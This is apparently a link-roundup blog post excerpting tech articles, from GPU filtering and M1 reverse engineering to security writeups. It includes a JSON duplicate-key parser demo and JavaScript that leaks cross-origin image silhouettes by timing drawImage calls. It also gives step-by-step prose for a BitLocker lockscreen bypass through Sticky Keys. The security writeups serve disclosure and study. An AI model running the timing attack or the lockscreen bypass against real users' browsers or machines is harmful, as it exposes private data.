Lotus 1-2-3 reversing
A ton of hacking later, and I do now have a usable driver for dosemu that supports arbitrary resolutions, just look at all those columns!
How I cut GTA Online loading times by 70%
Some debug-stepping later it turns out it’s… JSON!
Of course it is. But a really solid reversing effort. And a nice fix.
An Exploration of JSON Interoperability Vulnerabilities
The same JSON document can be parsed with different values across microservices, leading to a variety of potential security risks. If you prefer a hands-on approach, try the labs and when they scare you, come back and read on.
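The kind of divergence the article is about, as an added example (this is not the article's code, and the class name StrictJsonParser, the helper parseJson, compareParsers and the sample request body are all constructed for illustration): a small JSON parser with an explicit policy for duplicate object keys, run beside the built-in JSON.parse on one document. A validator that keeps the first value of a repeated key and a backend that keeps the last one will approve and execute two different orders.

```javascript
"use strict";

// Minimal JSON parser with an explicit duplicate-key policy (hypothetical,
// written for this example). "reject" is what a service boundary should do;
// "first"/"last" mimic parsers that silently pick one of the repeated values.
class StrictJsonParser {
  constructor(text, { duplicates = "reject" } = {}) {
    this.text = text; this.pos = 0; this.duplicates = duplicates;
  }
  parse() {
    const v = this.parseValue();
    if (this.peek() !== undefined) this.fail("trailing data");
    return v;
  }
  fail(msg) { throw new SyntaxError(`${msg} at offset ${this.pos}`); }
  peek() { while (" \t\n\r".includes(this.text[this.pos] ?? "\0")) this.pos++; return this.text[this.pos]; }
  expect(ch) { if (this.peek() !== ch) this.fail(`expected '${ch}'`); this.pos++; }
  parseValue() {
    const c = this.peek();
    if (c === "{") return this.parseObject();
    if (c === "[") return this.parseArray();
    if (c === '"') return this.parseString();
    if (c === "t" || c === "f" || c === "n") return this.parseLiteral();
    if (c === "-" || (c >= "0" && c <= "9")) return this.parseNumber();
    this.fail("unexpected input");
  }
  parseObject() {
    this.expect("{");
    const obj = Object.create(null); // null prototype: "__proto__" is an ordinary key here
    if (this.peek() === "}") { this.pos++; return obj; }
    for (;;) {
      if (this.peek() !== '"') this.fail("expected string key");
      const key = this.parseString();
      this.expect(":");
      const val = this.parseValue();
      if (!Object.prototype.hasOwnProperty.call(obj, key)) obj[key] = val;
      else if (this.duplicates === "reject") this.fail(`duplicate key "${key}"`);
      else if (this.duplicates === "last") obj[key] = val; // "first" keeps the existing value
      const c = this.peek();
      if (c === ",") { this.pos++; continue; }
      if (c === "}") { this.pos++; return obj; }
      this.fail("expected ',' or '}'");
    }
  }
  parseArray() {
    this.expect("[");
    const arr = [];
    if (this.peek() === "]") { this.pos++; return arr; }
    for (;;) {
      arr.push(this.parseValue());
      const c = this.peek();
      if (c === ",") { this.pos++; continue; }
      if (c === "]") { this.pos++; return arr; }
      this.fail("expected ',' or ']'");
    }
  }
  parseString() {
    this.expect('"');
    const esc = { '"': '"', "\\": "\\", "/": "/", b: "\b", f: "\f", n: "\n", r: "\r", t: "\t" };
    let out = "";
    for (;;) {
      const c = this.text[this.pos++];
      if (c === undefined) this.fail("unterminated string");
      if (c === '"') return out;
      if (c < " ") this.fail("control character in string");
      if (c !== "\\") { out += c; continue; }
      const e = this.text[this.pos++];
      if (e === "u") {
        const hex = this.text.slice(this.pos, this.pos + 4);
        if (!/^[0-9a-fA-F]{4}$/.test(hex)) this.fail("bad \\u escape");
        out += String.fromCharCode(parseInt(hex, 16)); this.pos += 4;
      } else if (Object.prototype.hasOwnProperty.call(esc, e)) out += esc[e];
      else this.fail("bad escape");
    }
  }
  parseNumber() {
    const m = /^-?(0|[1-9]\d*)(\.\d+)?([eE][+-]?\d+)?/.exec(this.text.slice(this.pos));
    if (!m) this.fail("bad number");
    this.pos += m[0].length;
    return Number(m[0]);
  }
  parseLiteral() {
    for (const [word, val] of [["true", true], ["false", false], ["null", null]]) {
      if (this.text.startsWith(word, this.pos)) { this.pos += word.length; return val; }
    }
    this.fail("bad literal");
  }
}
const parseJson = (text, opts) => new StrictJsonParser(text, opts).parse();

// Constructed request body: a repeated "qty" key, the classic way to make the
// validating service and the executing service see two different orders.
const SAMPLE = '{"item":"widget","qty":1,"qty":-1000}';

function compareParsers(text) {
  const r = {
    builtin: JSON.parse(text).qty,                       // JSON.parse: last key wins
    first: parseJson(text, { duplicates: "first" }).qty, // a parser that keeps the first
    last: parseJson(text, { duplicates: "last" }).qty,
  };
  try { parseJson(text); r.reject = "accepted"; } catch (e) { r.reject = e.message; }
  return r;
}
console.log(compareParsers(SAMPLE));
```

Run as is, the built-in parser and the "last" policy report qty -1000, the "first" policy reports 1, and the "reject" policy throws on the second "qty". Duplicate keys are only one of the divergence classes (number precision, comments, and trailing data are others), but the fix is the same: parse once, strictly, at the boundary, and pass the parsed object on rather than the raw bytes.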
Bilinear down/upsampling, aligning pixel grids, and that infamous GPU half pixel offset
It’s been more than two decades of me using bilinear texture filtering, a few months since I’ve written about bilinear resampling, but only two days since I discovered a bug of mine related to it. 😅 Similarly, just last week a colleague asked for a very fast implementation of bilinear on a CPU and it caused a series of questions: “which kind of bilinear?”.
So I figured it’s an opportunity for another short blog post – on bilinear filtering, but in the context of down/upsampling. We will touch here on GPU half pixel offsets, aligning pixel grids, a bug / confusion in TensorFlow, deeper signal processing analysis of what’s going on during bilinear operations, and analysis of the magic of the famous “magic kernel”.
Decades-Long Quest Reveals Details of the Proton’s Inner Antimatter
Twenty years ago, physicists set out to investigate a mysterious asymmetry in the proton’s interior. Their results, published today, show how antimatter helps stabilize every atom’s core.
We learn in school that a proton is a bundle of three elementary particles called quarks — two “up” quarks and a “down” quark, whose electric charges (+2/3 and −1/3, respectively) combine to give the proton its charge of +1. But that simplistic picture glosses over a far stranger, as-yet-unresolved story.
In reality, the proton’s interior swirls with a fluctuating number of six kinds of quarks, their oppositely charged antimatter counterparts (antiquarks), and “gluon” particles that bind the others together, morph into them and readily multiply. Somehow, the roiling maelstrom winds up perfectly stable and superficially simple — mimicking, in certain respects, a trio of quarks.
Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies
Block Profiling in Go
The block profile in Go lets you analyze how much time your program spends waiting on the blocking operations listed below:
2020 Chrome Extension Performance Report
I tested how the 1000 most popular Chrome extensions affect browser performance. The main metrics I’ll consider are CPU consumption, memory consumption, and whether the extension makes pages render more slowly.
Some results are terrible. Some are worse.
'Smallest reptile on earth' discovered in Madagascar
Two of the tiny lizards were discovered by a German-Madagascan expedition team in Madagascar. The male Brookesia nana, or nano-chameleon, has a body of just 13.5mm.
Improving texture atlas allocation in WebRender
This is a longer version of the piece I published in the mozilla gfx team blog where I focus on the atlas allocation algorithms. In this one I’ll go into more details about the process and methodology behind these improvements. The first part is about the making of guillotiere, a crate that I first released in March 2019. In the second part we’ll have a look at more recent work building upon what I did with guillotiere, to improve texture memory usage in WebRender/Firefox.
Uniwidth typefaces for interface design
Uniwidth typefaces, on the other hand, are proportionally-spaced typefaces, but every character occupies the same space across different cuts or weights. What this means in practice is that no matter which weight you set your text in, it will never change its length or cause text to reflow.
Achieving 11M IOPS & 66 GB/s IO on a Single ThreadRipper Workstation
In this post I’ll explain how I configured my AMD ThreadRipper Pro workstation with 10 PCIe 4.0 SSDs to achieve 11M IOPS with 4kB random reads and 66 GiB/s throughput with larger IOs - and what bottlenecks & issues I fixed to get there. We’ll look into Linux block I/O internals and their interaction with modern hardware. We’ll use tools & techniques, old and new, for measuring bottlenecks - and other adventures in the kernel I/O stack.
Dissecting the Apple M1 GPU
Apple’s latest line of Macs includes their in-house “M1” system-on-chip, featuring a custom GPU. This poses a problem for those of us in the Asahi Linux project who wish to run Linux on our devices, as this custom Apple GPU has neither public documentation nor open source drivers. Some speculate it might descend from PowerVR GPUs, as used in older iPhones, while others believe the GPU to be completely custom. But rumours and speculations are no fun when we can peek under the hood ourselves!
And part II where it really takes off: https://rosenzweig.io/blog/asahi-gpu-part-2.html
Porting Firefox to Apple Silicon
Even with all the pieces in place, quite a bit of work to do.
The release of Apple Silicon-based Macs at the end of last year generated a flurry of news coverage and some surprises at the machine’s performance. This post details some background information on the experience of porting Firefox to run natively on these CPUs.
We’ll start with some background on the Mac transition and give an overview of Firefox internals that needed to know about the new architecture, before moving on to the concept of Universal Binaries.
We’ll then explain how DRM/EME works on the new platform, talk about our experience with macOS Big Sur, and discuss various updater problems we had to deal with. We’ll conclude with the release and an overview of various other improvements that are in the pipeline.
BitLocker Lockscreen bypass
BitLocker is a modern data protection feature that is deeply integrated into the Windows kernel. It is used by many corporations as a means of protecting company secrets in case of theft. Microsoft recommends that you have a Trusted Platform Module which can do some of the heavy cryptographic lifting for you.
If we smash Shift 5 times in quick succession, a link to open the Settings app appears, and the link actually works. We cannot see the launched Settings app. Giving the launched app focus is slightly tricky; you have to click the link and then click a place where the launched app would be visible with the correct timing. The easiest way to learn to do it is to keep clicking the link roughly twice a second. The Sticky Keys window will disappear. Keep clicking! You will now see a focus box drawn in the middle of the screen. That was the Settings app, and you have to stop clicking when it gets focus.
Accessibility UX wins again.
Leaking silhouettes of cross-origin images
This is a writeup of a vulnerability I found in Chromium and Firefox that could allow a malicious page to read some parts of an image located on an origin it is not supposed to be able to access. Although technically interesting, it is quite limited in scope—I am not aware of any major websites it could’ve been used against. As of November 17th, 2020, the vulnerability has been fixed in the most recent versions of both browsers.
The time that it takes CanvasRenderingContext2D.drawImage to draw a pixel depends on whether it is fully transparent, opaque, or semi-transparent. By timing a bunch of calls to drawImage, we can reliably infer the transparency of each pixel in a cross-origin image, which is enough to, for example, read text on a transparent background, like this:
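The shape of that attack, as an added example rather than the writeup's own code: a browser-side loop that times drawImage for one source pixel at a time, and a classifier that turns the per-pixel timings into a silhouette. The scaling factor, the repetition count, and the names timePixel, silhouette and render are assumptions made for this example; the timing matrix below is constructed to stand in for real measurements, since the canvas calls need a browser and only the classifier runs here. The writeup distinguishes three classes (transparent, opaque, semi-transparent); this reduces the problem to "drawn or not", which is what you need to read text on a transparent background.

```javascript
"use strict";

// Browser side (assumption: ctx is a 2D canvas context and img a loaded
// cross-origin HTMLImageElement). One source pixel is stretched over a
// scale×scale area so that the per-pixel cost difference dominates the call,
// and the median of many repetitions smooths out timer coarsening.
function timePixel(ctx, img, x, y, reps = 200, scale = 300) {
  const samples = [];
  for (let i = 0; i < reps; i++) {
    const t0 = performance.now();
    ctx.drawImage(img, x, y, 1, 1, 0, 0, scale, scale);
    samples.push(performance.now() - t0);
  }
  return median(samples);
}

function median(a) {
  const s = [...a].sort((p, q) => p - q);
  const m = s.length >> 1;
  return s.length % 2 ? s[m] : (s[m - 1] + s[m]) / 2;
}

// Two-cluster 1-D k-means over the timing grid: the slow cluster is the
// pixels that were actually drawn, the fast one is transparent pixels.
// Returns a 0/1 mask of the same shape as the input.
function silhouette(grid) {
  const flat = grid.flat();
  let lo = Math.min(...flat), hi = Math.max(...flat);
  for (let iter = 0; iter < 20; iter++) {
    const a = [], b = [];
    for (const v of flat) (Math.abs(v - lo) <= Math.abs(v - hi) ? a : b).push(v);
    const nlo = a.length ? a.reduce((s, v) => s + v, 0) / a.length : lo;
    const nhi = b.length ? b.reduce((s, v) => s + v, 0) / b.length : hi;
    if (nlo === lo && nhi === hi) break;
    lo = nlo; hi = nhi;
  }
  const threshold = (lo + hi) / 2;
  return grid.map((row) => row.map((v) => (v > threshold ? 1 : 0)));
}

function render(mask) {
  return mask.map((r) => r.map((b) => (b ? "#" : ".")).join("")).join("\n");
}

// Constructed timings (ms) standing in for timePixel() over a 5x7 region:
// about 0.04 ms where the pixel is transparent, about 0.12 ms where it is
// drawn, with a little jitter, laid out as a letter "T".
const SAMPLE_TIMINGS = [
  [0.12, 0.13, 0.11, 0.12, 0.13, 0.12, 0.11],
  [0.04, 0.05, 0.04, 0.12, 0.04, 0.05, 0.04],
  [0.05, 0.04, 0.04, 0.13, 0.04, 0.04, 0.05],
  [0.04, 0.04, 0.05, 0.11, 0.05, 0.04, 0.04],
  [0.04, 0.05, 0.04, 0.12, 0.04, 0.04, 0.05],
];

console.log(render(silhouette(SAMPLE_TIMINGS)));
```

Browsers coarsen performance.now(), so a single draw rarely separates the two classes; the repetitions and the median are what make the difference show up, and the clustering step means you never have to hard-code a threshold for a particular machine. The same structure (amplify, repeat, take a robust statistic, cluster) is how you would evaluate whether a fix actually removed the timing dependence rather than just shrinking it.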
Ditherpunk — The article I wish I had about monochrome image dithering
Stealing Your Private YouTube Videos, One Frame at a Time
I quickly Googled “base64 to image”, and pasted the base64 into the first decoder I found, and it displayed a thumbnail from the target Private video! It worked! I have found a working IDOR (Insecure Direct Object Reference) bug, where I could get a frame from any private video on YouTube!
GNOME has no thumbnails in the file picker (and my toilets are blocked)
The file picker is the pop-up box thingy that appears when you’re opening a file, usually when uploading something online. The GNOME desktop environment uses the file picker package GtkFileChooser. This file picker does not have a thumbnail view. It is broken software. Thumbnails are not a cute little extra, they are essential. This is as bad as a file picker that doesn’t list the name of the files, only their creation date, or inode serial number. It is broken software.
Personally, not a big deal, but fair point.
Cincinnati Built a Subway System 100 Years Ago–But Never Used It
The Cincinnati subway stations are still there. But if you’re still waiting for a train to come, you’ve been waiting for almost a century. To this day Cincinnati remains home to the largest unused subway system in the world, with over two miles of empty tunnels. Engineers who inspected the tunnels recently deemed them in “very good condition.”